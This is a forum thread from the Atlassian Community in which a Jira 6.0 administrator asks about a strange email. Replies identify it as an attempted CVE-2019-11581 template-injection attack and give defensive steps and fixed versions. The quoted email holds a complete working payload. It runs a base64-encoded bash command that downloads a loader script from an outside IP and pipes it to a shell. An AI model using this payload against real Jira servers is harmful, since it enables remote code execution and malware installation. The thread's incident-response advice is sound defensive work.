Showing results for 
Search instead for 
Did you mean: 
Sign up Log in

It's not the same without you

Join the community to find out what other Atlassian users are discussing, debating and creating.

Atlassian Community Hero Image Collage

got Weird Email from our JIRA application



       Please someone help me advise why we got weird email from our JIRA application. Our JIRA application version is (v6.0.2#6097-sha1:e270beb). Below are email message from our JIRA application.


[JIRA] #set ($cmd="bash -c {echo,c2ggLWMgIihjdXJsIC0tdXNlci1hZ2VudCBjdmVfMjAxOV8xMTU4MSBodHRwOi8vMTk0LjE0NS4yMjcuMjEvbGRyLnNofHx3Z2V0IC0tdXNlci1hZ2VudCBjdmVfMjAxOV8xMTU4MSAtcSAtTyAtIGh0dHA6Ly8xOTQuMTQ1LjIyNy4yMS9sZHIuc2gpfHNoIg==}|{base64,-d}|{bash,-i}") #set ($e="exp") #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) #set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) #set($sc = $e.getClass().forName("java.util.Scanner")) #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName(""))) #set($scan=$constructor.newInstance($input).useDelimiter("\A")) #if($scan.hasNext()) $ #end




4 answers

2 votes
Daniel Eads Atlassian Team Apr 01, 2021

Hi Michael,

I've looked through the command this string is attempting to execute, and believe the file it tries to download and run is a malware loader. I would advise taking these steps:

  1. Disable the "contact administrators" form in your Jira instance:
    1. Choose the  Administration () System.
    2. Choose General Configuration.
    3. Click Edit Settings.
    4. Scroll down to the Contact Administrators Form and set it to OFF.
    5. Click Update.
  2. Block the following URLs from being accessed by the internet, if you have a reverse proxy in front of your Jira instance:
    1. /secure/ContactAdministrators
    2. /secure/admin/SendBulkMail!default.jspa
    3. /admin/SendBulkMail!default.jspa
    4. /SendBulkMail!default.jspa
  3. Scan your server for malware
    1. The loader file in your question attempts to move the executable for iptables from /sbin/iptables to /sbin/iptables_  - I would consider the presence of that renamed executable to be proof that the loader script had run and that the server is likely compromised.
  4. Upgrade Jira to a recent version - any version released after July 10, 2019 should contain the fix for this CVE, as described in the security advisory for CVE-2019-11581 . Since you are currently on Jira 6.0, you will need to make at least one intermediary upgrade to 7.0 before continuing up to a more recent version of Jira. I would suggest the following upgrade path:
    1. 6.0 (your current version) -> 6.4 -> 7.0 -> 7.6.17 (the last release in 7.6 - which contains the fix for the CVE)
    2. See Upgrading Jira applications for more upgrade information
  5. At this point, I would suggest either considering a Cloud migration - our cloud migration assistant app supports Jira 7.6 and newer - or continue upgrading to a more recent version of Jira Server such as Jira 8.13.

Anyone can help for my issue?

Hello Michael,


We received the exact same emails not long ago. We decided to open a ticket on Atlassian support. We believe it is related to and but we are not sure.


Best regards,


Hi Bastien

Could you get a solution for this weird mail ?

Hello Ramith,


Atlassian confirmed that if your Jira has been upgraded to a fixed version, this is not a problem.

List of fixed versions:

  • 7.6.14
  • 7.13.5
  • 8.0.3
  • 8.1.2
  • 8.2.3
  • All versions higher than 8.3

Therefore, we were protected but we were definitely under attack.

Hi Anyone can help me for this issue?

Suggest an answer

Log in or Sign up to answer

Community Events

Connect with like-minded Atlassian users at free events near you!

Find an event

Connect with like-minded Atlassian users at free events near you!

Unfortunately there are no Community Events near you at the moment.

Host an event

You're one step closer to meeting fellow Atlassian users at your local event. Learn more about Community Events

Events near you